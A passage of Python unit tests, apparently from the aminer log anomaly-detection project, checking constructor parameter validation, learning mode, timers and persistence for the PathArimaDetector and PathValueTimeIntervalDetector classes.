self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=100) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=b"True") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length="True") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=123) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=123.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, force_period_length=True) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=0) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=100.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, set_period_length=100) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=1.1) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha=0) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha=0.5) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha=1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=1.1) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=0) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=0.5) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, alpha_bt=1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=0) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=100.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_results_bt=100) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=0) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=set()) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=0) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=30, num_max_time_history=20) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_max_time_history=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=20, num_max_time_history=100) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_min_time_history=20.1, num_max_time_history=100.1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=0) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=100.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_periods_tsa_ini=20) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list="") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=True) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=123.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, log_resource_ignore_list=["file:///tmp/syslog"]) @classmethod def setUpClass(cls): """Set up the data for the all tests.""" cls.alphabet = b"abcdefghijklmnopqrstuvwxyz" cls.analysis = "Analysis.%s" children = [] for _, val in enumerate(cls.alphabet): char = bytes([val]) children.append(DummyFixedDataModelElement("value", char)) cls.alphabet_model = DummyFirstMatchModelElement("first", children) cls.data = cls.generate_data(cls, 120, 1) set_random_seed(42) def run_pad_test(self, pad, etd, log_atoms): """Run the ECD test.""" for log_atom in log_atoms: etd.receive_atom(log_atom) pad.receive_atom(log_atom) self.assertTrue(pad.arima_models) def generate_data(self, iterations, diff): """Generate data without any error.""" log_atoms = [] t = time.time() for i in range(1, iterations+1): char = bytes([self.alphabet[i % len(self.alphabet)]]) t += diff num = str(random.uniform(0, 1000)).encode() m1 = MatchElement("/model/id", num, num, None) m2 = MatchElement("/model/value", char, char, None) log_atoms.append(LogAtom(num + char, ParserMatch(MatchElement("/model", num + char, num + char, [m1, m2])), t + 1, None)) return log_atoms if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/PathValueTimeIntervalDetectorTest.py000066400000000000000000001010571500476301700327300ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.PathValueTimeIntervalDetector import PathValueTimeIntervalDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class PathValueTimeIntervalDetectorTest(TestBase): """Unittests for the PathValueTimeIntervalDetector.""" def test1receive_atom(self): """ Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ t = time.time() expected_string_first = '%s First time (%d) detected for [%s]\n%s: "None" (%d lines)\n %s\n\n' expected_string_new = '%s New time (%d) out of range of previously observed times %s detected for [%s]\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" log_atom1 = LogAtom(b"1", ParserMatch(MatchElement("/model/id", b"1", b"1", None)), t, None) log_atom2 = LogAtom(b"1", ParserMatch(MatchElement("/model/value", b"1", b"1", None)), t, None) log_atom3 = LogAtom(b"3", ParserMatch(MatchElement("/model/id", b"3", b"3", None)), t, None) pvtid = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], learn_mode=True, output_logline=False) pvtid.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string_first % (datetime.fromtimestamp(t).strftime(dtf), int(t % pvtid.time_period_length), "1", pvtid.__class__.__name__, 1, "/model/id\n1")) self.reset_output_stream() appeared_time_list = {(log_atom1.raw_data.decode(),): [t % pvtid.time_period_length]} for i in range(10): log_atom1.atom_time += 1 pvtid.receive_atom(log_atom1) appeared_time_list[(log_atom1.raw_data.decode(),)] += [log_atom1.atom_time % pvtid.time_period_length] if (i + 1) % pvtid.num_reduce_time_list == 0: appeared_time_list[(log_atom1.raw_data.decode(),)] = [appeared_time_list[(log_atom1.raw_data.decode(),)][0], appeared_time_list[(log_atom1.raw_data.decode(),)][-1]] self.assertEqual(pvtid.counter_reduce_time_intervals[(log_atom1.raw_data.decode(),)], (i+1) % pvtid.num_reduce_time_list) self.assertEqual(pvtid.appeared_time_list, appeared_time_list) log_atom1.atom_time = t + 100000 pvtid.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string_new % (datetime.fromtimestamp(t+100000).strftime(dtf), int((t+100000) % pvtid.time_period_length), [int(t % pvtid.time_period_length), int((t+10) % pvtid.time_period_length)], "1", pvtid.__class__.__name__, 1, "/model/id\n1")) self.reset_output_stream() log_atom1.atom_time = t # allow_missing_values_flag=False pvtid = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], learn_mode=True, output_logline=False, allow_missing_values_flag=False) pvtid.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string_first % (datetime.fromtimestamp(t).strftime(dtf), int(t % pvtid.time_period_length), "1", pvtid.__class__.__name__, 1, "/model/id\n1")) self.reset_output_stream() appeared_time_list = {(log_atom1.raw_data.decode(),): [t % pvtid.time_period_length]} for i in range(10): log_atom1.atom_time += 1 pvtid.receive_atom(log_atom1) appeared_time_list[(log_atom1.raw_data.decode(),)] += [log_atom1.atom_time % pvtid.time_period_length] if (i + 1) % pvtid.num_reduce_time_list == 0: appeared_time_list[(log_atom1.raw_data.decode(),)] = [appeared_time_list[(log_atom1.raw_data.decode(),)][0], appeared_time_list[(log_atom1.raw_data.decode(),)][-1]] self.assertEqual(pvtid.counter_reduce_time_intervals[(log_atom1.raw_data.decode(),)], (i+1) % pvtid.num_reduce_time_list) self.assertEqual(pvtid.appeared_time_list, appeared_time_list) log_atom1.atom_time = t + 100000 pvtid.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string_new % (datetime.fromtimestamp(t+100000).strftime(dtf), int((t+100000) % pvtid.time_period_length), [int(t % pvtid.time_period_length), int((t+10) % pvtid.time_period_length)], "1", pvtid.__class__.__name__, 1, "/model/id\n1")) self.reset_output_stream() log_atom1.atom_time = t self.assertFalse(pvtid.receive_atom(log_atom2)) # stop_learning_time pvtid = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_time=100) self.assertTrue(pvtid.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(pvtid.receive_atom(log_atom1)) self.assertTrue(pvtid.learn_mode) log_atom1.atom_time = t + 101 self.assertTrue(pvtid.receive_atom(log_atom1)) self.assertFalse(pvtid.learn_mode) # stop_learning_no_anomaly_time pvtid = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(pvtid.receive_atom(log_atom1)) log_atom3.atom_time = t + 100 self.assertTrue(pvtid.receive_atom(log_atom3)) self.assertTrue(pvtid.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(pvtid.receive_atom(log_atom2)) self.assertTrue(pvtid.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(pvtid.receive_atom(log_atom1)) self.assertTrue(pvtid.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(pvtid.receive_atom(log_atom1)) self.assertFalse(pvtid.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" pvtid = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"]) t = time.time() pvtid.next_persist_time = t + 400 self.assertEqual(pvtid.do_timer(t + 200), 200) self.assertEqual(pvtid.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(pvtid.do_timer(t + 999), 1) self.assertEqual(pvtid.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3persistence(self): """Test the do_persist and load_persistence_data methods.""" t = time.time() log_atom1 = LogAtom(b"1", ParserMatch(MatchElement("/model/id", b"1", b"1", None)), t, None) pvtid = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], learn_mode=True, output_logline=False) pvtid.receive_atom(log_atom1) appeared_time_list = {(log_atom1.raw_data.decode(),): [t % pvtid.time_period_length]} for i in range(10): log_atom1.atom_time += 1 pvtid.receive_atom(log_atom1) appeared_time_list[(log_atom1.raw_data.decode(),)] += [log_atom1.atom_time % pvtid.time_period_length] if (i + 1) % pvtid.num_reduce_time_list == 0: appeared_time_list[(log_atom1.raw_data.decode(),)] = [appeared_time_list[(log_atom1.raw_data.decode(),)][0], appeared_time_list[(log_atom1.raw_data.decode(),)][-1]] log_atom1.atom_time = t + 100000 appeared_time_list[(log_atom1.raw_data.decode(),)] = [log_atom1.atom_time % pvtid.time_period_length] + appeared_time_list[(log_atom1.raw_data.decode(),)] pvtid.receive_atom(log_atom1) pvtid.do_persist() with open(pvtid.persistence_file_name, "r") as f: data = f.read().replace('[[[["string:1"], [', "").replace(']]], [[["string:1"], 1]]]', "").split(",") data = [float(x) for x in data] data.sort() data1 = appeared_time_list[(log_atom1.raw_data.decode(),)] data1.sort() self.assertEqual(data, data1) self.assertEqual(pvtid.counter_reduce_time_intervals[(log_atom1.raw_data.decode(),)], 1) self.assertEqual(pvtid.appeared_time_list, appeared_time_list) pvtid.appeared_time_list = {} pvtid.counter_reduce_time_intervals = {} pvtid.load_persistence_data() self.assertEqual(pvtid.counter_reduce_time_intervals[(log_atom1.raw_data.decode(),)], 1) self.assertEqual(pvtid.appeared_time_list, appeared_time_list) other = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/model/value"], learn_mode=True) self.assertEqual(other.counter_reduce_time_intervals, pvtid.counter_reduce_time_intervals) self.assertEqual(other.appeared_time_list, pvtid.appeared_time_list) def test4add_to_persistence_event(self): pvtid = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"]) pvtid.add_to_persistence_event("Analysis.PathValueTimeIntervalDetector", [["a"], 3.0]) self.assertEqual(pvtid.counter_reduce_time_intervals, {('a',): 0}) self.assertEqual(pvtid.appeared_time_list, {('a',): [3.0]}) def test5remove_from_persistence_event(self): pvtid = PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"]) pvtid.counter_reduce_time_intervals = {('a',): 0} pvtid.appeared_time_list = {('a',): [3.0]} pvtid.remove_from_persistence_event("Analysis.PathValueTimeIntervalDetector", [["a"], 3.0]) self.assertEqual(pvtid.counter_reduce_time_intervals, {('a',): 0}) self.assertEqual(pvtid.appeared_time_list, {('a',): []}) def test6validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, ["default"], ["/model/value"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, None, ["/model/value"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, "", ["/model/value"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, b"Default", ["/model/value"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, True, ["/model/value"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, 123, ["/model/value"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, 123.3, ["/model/value"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, {"id": "Default"}, ["/model/value"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, (), ["/model/value"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, set(), ["/model/value"]) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], [""]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], [None]) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], None) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], "") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], 123.3) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], set()) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id="") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=None) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=b"Default") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=True) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=123) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=123.22) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id={"id": "Default"}) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=["Default"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=[]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=()) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id=set()) PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], persistence_id="Default") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_values_flag=b"True") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_values_flag="True") self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_values_flag=123) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_values_flag=123.22) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_values_flag={"id": "Default"}) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_values_flag=["Default"]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_values_flag=[]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_values_flag=()) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_values_flag=set()) PathValueTimeIntervalDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], allow_missing_values_flag=True) self.assertRaises(ValueError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list=[""]) self.assertRaises(TypeError, PathValueTimeIntervalDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/value"], ignore_list="") self.assertRaises(TypeError, 